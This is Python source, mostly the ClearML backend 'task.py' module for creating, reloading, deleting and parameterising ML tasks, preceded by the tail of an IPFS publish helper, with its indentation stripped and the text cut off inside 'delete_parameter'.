m = re.match("Published to (Qm[0-9A-Za-z]{44}): /ipfs/(Qm[0-9A-Za-z]{44})",
last_line)
if m:
ipns_hash = m.group(1)
else:
log.error("Unable to match ipns regex with:%s" % last_line)
log.debug("ipns_hash:%s" % ipns_hash)
return ipns_hash
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import re
import sys
import warnings
from copy import copy
from datetime import datetime
from enum import Enum
from multiprocessing import RLock
from operator import itemgetter
from tempfile import gettempdir
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set
from uuid import uuid4
from pathlib2 import Path
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...utilities.proxy_object import verify_basic_type
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_interface.session import SendError
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ...utilities.config import config_dict_to_text, text_to_config_dict
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import (
make_message, get_or_create_project, get_single_result,
exact_match_regex, mutually_exclusive, )
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, deferred_config, )
from ...debugging import get_logger
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .repo import ScriptInfo, pip_freeze
from .hyperparams import HyperParams
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR, DOCKER_BASH_SETUP_ENV_VAR
from ...utilities.process.mp import SingletonLock
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
archived_tag = 'archived'
_default_configuration_section_name = 'General'
_legacy_parameters_section_name = 'Args'
_force_requirements = {}
_ignore_requirements = set()
_store_diff = deferred_config('development.store_uncommitted_code_diff', False)
_store_remote_diff = deferred_config('development.store_code_diff_from_remote', False)
_report_subprocess_enabled = deferred_config('development.report_use_subprocess', sys.platform == 'linux')
_force_use_pip_freeze = deferred_config(multi=[('development.detect_with_pip_freeze', False),
('development.detect_with_conda_freeze', False)])
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
class DeleteError(Exception):
pass
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, minimum length of 3 characters, used only if a new task is created.
The new task will be associated with a project by this name. If no such project exists, a new project will
be created using the API.
:type project_name: str
:param task_name: Optional task name, minimum length of 3 characters, used only if a new task is created.
:type project_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
SingletonLock.instantiate()
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._metrics_manager = None
self.__reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = tuple(set(
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
))
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate(check_output_dest_credentials=False)
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = get_log_to_backend(default=log_to_backend)
self._artifacts_manager = Artifacts(self)
self._hyper_params_manager = HyperParams(self)
def _validate(self, check_output_dest_credentials=False):
if not self._is_remote_main_task():
self._storage_uri = self.get_output_destination(raise_on_error=False, log_on_error=False) or None
return
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'ClearML new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log, create_requirements=False,
check_uncommitted=self._store_diff, uncommitted_from_remote=self._store_remote_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git is too large to store on the task, we must store it as artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if self._force_use_pip_freeze:
if isinstance(self._force_use_pip_freeze, (str, Path)):
conda_requirements = ''
req_file = Path(self._force_use_pip_freeze)
requirements = req_file.read_text() if req_file.is_file() else None
else:
requirements, conda_requirements = pip_freeze(
combine_conda_with_pip=config.get('development.detect_with_conda_freeze', True))
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ requirements
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if isinstance(task_type, self.TaskTypes):
task_type = task_type.value
if task_type not in (self.TaskTypes.training.value, self.TaskTypes.testing.value) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type))
task_type = self.TaskTypes.training.value
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('execution.model', raise_on_error=False)
return {'Input Model': model_id} if model_id else {}
input_models = self._get_task_property('models.input', default=[]) or []
return {m.name: m.model for m in input_models}
@property
def output_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('output.model', raise_on_error=False)
return {'Output Model': model_id} if model_id else {}
output_models = self._get_task_property('models.output', default=[]) or []
return {m.name: m.model for m in output_models}
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated.
ClearML reloads the Task status information only, when this value is accessed.
return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
def reload(self):
# type: () -> ()
"""
Reload current Task's state from clearml-server.
Refresh all task's fields, including artifacts / models / parameters etc.
"""
return super(Task, self).reload()
def _get_output_model(self, upload_required=True, model_id=None):
# type: (bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or None,
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def _reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self.__reporter is None:
self._setup_reporter()
return self.__reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self.__reporter = Reporter(
metrics=self._get_metrics_manager(storage_uri=storage_uri), task=self)
return self.__reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True, force=False):
# type: (bool, bool) -> ()
"""
Reset the task. Task will be reloaded following a successful reset.
:param set_started_on_success: If True automatically set Task status to started after resetting it.
:param force: If not true, call fails if the task status is 'completed'
"""
self.send(tasks.ResetRequest(task=self.id, force=force))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False, status_reason=None):
# type: (bool, bool, Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.StoppedRequest(self.id, force=force, status_reason=status_reason),
ignore_errors=ignore_errors
)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
"""
.. note:: Deprecated, use mark_completed(...) instead
"""
warnings.warn("'completed' is deprecated; use 'mark_completed' instead.", DeprecationWarning)
return self.mark_completed(ignore_errors=ignore_errors)
def mark_completed(self, ignore_errors=True, status_message=None, force=False):
# type: (bool, Optional[str], bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(
tasks.CompletedRequest(self.id, status_reason='completed', status_message=status_message, force=force),
ignore_errors=ignore_errors
)
return self.send(
tasks.StoppedRequest(self.id, status_reason='completed', status_message=status_message, force=force),
ignore_errors=ignore_errors
)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None, force=False):
# type: (bool, Optional[str], Optional[str], bool) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.FailedRequest(
task=self.id, status_reason=status_reason, status_message=status_message, force=force),
ignore_errors=ignore_errors,
)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) not in (str(tasks.TaskStatusEnum.stopped), str(tasks.TaskStatusEnum.completed)):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def _delete(
self,
delete_artifacts_and_models=True,
skip_models_used_by_other_tasks=True,
raise_on_error=False,
):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as it's output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True)
:param raise_on_error: If True an exception will be raised when encountering an error.
If False an error would be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
try:
res = self.send(tasks.GetByIdRequest(self.task_id))
task = res.response.task
if task.status == Task.TaskStatusEnum.published:
if raise_on_error:
raise self.DeleteError("Cannot delete published task {}".format(self.task_id))
self.log.error("Cannot delete published task {}".format(self.task_id))
return False
execution = {}
models_res = []
if delete_artifacts_and_models:
execution = task.execution.to_dict() if task.execution else {}
models_res = self.send(
models.GetAllRequest(
task=[task.id], only_fields=["id", "uri"]
)
).response.models
event_uris = list(self._get_all_events(
event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000
))
event_uris.extend(self._get_image_plot_uris())
task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True))
if not task_deleted:
if raise_on_error:
raise self.DeleteError("Failed deleting task {}".format(self.task_id))
self.log.error("Failed deleting task {}".format(self.task_id))
return False
except self.DeleteError:
raise
except Exception as ex:
if raise_on_error:
raise self.DeleteError("Task deletion failed: {}".format(ex))
self.log.error("Task deletion failed: {}".format(ex))
return False
failures = []
if delete_artifacts_and_models:
for e in execution["artifacts"]:
if e["mode"] == "output" and not self._delete_uri(e["uri"]):
failures.append(e["uri"])
for m in models_res:
# noinspection PyBroadException
try:
is_output_model = task.output and (m.id == task.output.model)
res = self.send(
models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)),
ignore_errors=is_output_model
)
# Should delete if model was deleted or if this was the output model (which was already deleted
# by DeleteRequest, and it's URI is dangling
should_delete = is_output_model or res.response.deleted
except SendError as ex:
if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201):
# Model not found, already deleted by DeleteRequest
should_delete = True
else:
failures.append("model id: {}".format(m.id))
continue
except Exception:
failures.append("model id: {}".format(m.id))
continue
if should_delete and not self._delete_uri(m.uri):
failures.append(m.uri)
event_uris = list(filter(None, event_uris))
for uri in event_uris:
if not self._delete_uri(uri):
failures.append(uri)
failures = list(filter(None, failures))
if len(failures):
error = "Failed deleting the following URIs:\n{}".format(
"\n".join(failures)
)
if raise_on_error:
raise self.DeleteError(error)
self.log.error(error)
return task_deleted
def _delete_uri(self, uri):
# type: (str) -> bool
# noinspection PyBroadException
try:
deleted = StorageHelper.get(uri).delete(uri)
if deleted:
self.log.debug("Deleted file: {}".format(uri))
return True
except Exception as ex:
self.log.error("Failed deleting {}: {}".format(uri, str(ex)))
return False
return False
def _get_image_plot_uris(self):
# type: () -> Set[str]
def image_source_selector(d):
plot = d.get("plot_str")
if plot:
# noinspection PyBroadException
try:
plot = json.loads(plot)
return next(
filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))),
None
)
except Exception:
pass
return self._get_all_events(
event_type="plot",
unique_selector=image_source_selector,
batch_size=10000
)
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('mode_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(
self,
model_path, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
model_name=None, # type: Optional[str]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
then ClearML updates the model object associated with the Task an API call. The API call uses with the URI
of the uploaded file, and other values provided by additional arguments.
:param model_path: A local weights file or folder to be uploaded.
If remote URI is provided (e.g. http:// or s3: // etc) then the URI is stored as is, without any upload
:param name: The updated model name.
If not provided, the name is the model weights file filename without the extension.
:param comment: The updated model description. (Optional)
:param tags: The updated model tags. (Optional)
:param model_name: If provided the model name as it will appear in the model artifactory. (Optional)
Default: Task.name - name
:param iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file.
Notice: upload is done is a background thread, while the function call returns immediately
"""
from ...model import OutputModel
output_model = OutputModel(
task=self,
name=model_name or ('{} - {}'.format(self.name, name) if name else self.name),
tags=tags,
comment=comment
)
output_model.connect(task=self, name=name)
url = output_model.update_weights(weights_filename=model_path, iteration=iteration)
return url
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(
self,
model_id=None,
model_name=None,
update_task_design=True,
update_task_labels=True,
name=None
):
# type: (str, Optional[str], bool, bool, Optional[str]) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name in the artifactory. The model_name is used to locate an existing model
in the **ClearML Server** (backend). If ``model_id`` is not specified,
then ``model_name`` must be specified.
:param update_task_design: Update the Task's design
- ``True`` - ClearML copies the Task's model design from the input model.
- ``False`` - ClearML does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration
- ``True`` - ClearML copies the Task's label enumeration from the input model.
- ``False`` - ClearML does not copy the Task's label enumeration from the input model.
:param name: Model section name to be stored on the Task (unrelated to the model object name itself)
Default: the the model weight filename is used (excluding file extension)
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name and not model_id:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created', 'uri']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
name = name or Path(model.uri).stem
else:
# clear the input model
model = None
model_id = ''
name = name or 'Input Model'
with self._edit_lock:
self.reload()
# store model id
if Session.check_min_api_version("2.13"):
self.send(tasks.AddOrUpdateModelRequest(
task=self.id, name=name, model=model_id, type=tasks.ModelTypeEnum.input
))
else:
# backwards compatibility
self._set_task_property("execution.model", model_id, raise_on_error=False, log_on_error=False)
# Auto populate from model, if empty
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def get_parameters(self, backwards_compatibility=True):
# type: (bool) -> (Optional[dict])
"""
Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not
support parameter descriptions (the result is a dictionary of key-value pairs).
Notice the returned parameter dict is flat:
i.e. {'Args/param': 'value'} is the argument "param" from section "Args"
:param backwards_compatibility: If True (default) parameters without section name
(API version < 2.9, clearml-server < 0.16) will be at dict root level.
If False, parameters without section name, will be nested under "Args/" key.
:return: dict of the task parameters, all flattened to key/value.
Different sections with key prefix "section/"
"""
if not Session.check_min_api_version('2.9'):
return self._get_task_property('execution.parameters')
# API will makes sure we get old parameters with type legacy on top level (instead of nested in Args)
parameters = dict()
hyperparams = self._get_task_property('hyperparams') or {}
if not backwards_compatibility:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
parameters['{}/{}'.format(section, key)] = section_param.value
else:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ):
parameters['{}'.format(key)] = section_param.value
else:
parameters['{}/{}'.format(section, key)] = section_param.value
return parameters
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
return self._set_parameters(*args, __update=False, **kwargs)
def _set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
def stringify(value):
# return empty string if value is None
if value is None:
return ""
str_value = str(value)
if isinstance(value, (tuple, list, dict)):
if 'None' in re.split(r'[ ,\[\]{}()]', str_value):
# If we have None in the string we have to use json to replace it with null,
# otherwise we end up with None as string when running remotely
try:
str_json = json.dumps(value)
# verify we actually have a null in the string, otherwise prefer the str cast
# This is because we prefer to have \' as in str and not \" used in json
if 'null' in re.split(r'[ ,\[\]{}()]', str_json):
return str_json
except TypeError:
# if we somehow failed to json serialize, revert to previous std casting
pass
elif any('\\' in str(v) for v in value):
try:
str_json = json.dumps(value)
return str_json
except TypeError:
pass
return str_value
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
prefix = kwargs.pop('__parameters_prefix', None)
descriptions = kwargs.pop('__parameters_descriptions', None) or dict()
params_types = kwargs.pop('__parameters_types', None) or dict()
update = kwargs.pop('__update', False)
# new parameters dict
new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
new_parameters.update(kwargs)
if prefix:
prefix = prefix.strip('/')
new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items())
# verify parameters type:
not_allowed = {
k: type(v).__name__
for k, v in new_parameters.items()
if not verify_basic_type(v, self._parameters_allowed_types)
}
if not_allowed:
self.log.warning(
"Skipping parameter: {}, only builtin types are supported ({})".format(
', '.join('%s[%s]' % p for p in not_allowed.items()),
', '.join(t.__name__ for t in self._parameters_allowed_types))
)
new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed}
use_hyperparams = Session.check_min_api_version('2.9')
with self._edit_lock:
self.reload()
# if we have a specific prefix and we use hyperparameters, and we use set.
# overwrite only the prefix, leave the rest as is.
if not update and prefix:
parameters = copy(self.get_parameters() or {})
parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/'))
elif update:
parameters = copy(self.get_parameters() or {})
else:
parameters = dict()
parameters.update(new_parameters)
if use_hyperparams:
# build nested dict from flat parameters dict:
org_hyperparams = self.data.hyperparams or {}
hyperparams = dict()
# if the task is a legacy task, we should put everything back under Args/key with legacy type
legacy_name = self._legacy_parameters_section_name
org_legacy_section = org_hyperparams.get(legacy_name, dict())
for k, v in parameters.items():
# legacy variable
if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy':
section = hyperparams.get(legacy_name, dict())
section[k] = copy(org_legacy_section[k])
section[k].value = stringify(v)
description = descriptions.get(k)
if description:
section[k].description = description
hyperparams[legacy_name] = section
continue
org_k = k
if '/' not in k:
k = '{}/{}'.format(self._default_configuration_section_name, k)
section_name, key = k.split('/', 1)
section = hyperparams.get(section_name, dict())
org_param = org_hyperparams.get(section_name, dict()).get(key, None)
param_type = params_types[org_k] if org_k in params_types else (
org_param.type if org_param is not None else type(v) if v is not None else None
)
if param_type and not isinstance(param_type, str):
param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type)
section[key] = tasks.ParamsItem(
section=section_name, name=key,
value=stringify(v),
description=descriptions[org_k] if org_k in descriptions else (
org_param.description if org_param is not None else None
),
type=param_type,
)
hyperparams[section_name] = section
self._edit(hyperparams=hyperparams)
self.data.hyperparams = hyperparams
else:
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: stringify(v) for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None, value_type=None):
# type: (str, str, Optional[str], Optional[Any]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
:param value_type: The type of the parameters (cast to string and store)
"""
if not Session.check_min_api_version('2.9'):
# not supported yet
description = None
value_type = None
self._set_parameters(
{name: value}, __update=True,
__parameters_descriptions={name: description},
__parameters_types={name: value_type}
)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def delete_parameter(self, name):
# type: (str) -> bool
"""
Delete a parameter byt it's full name Section/name.
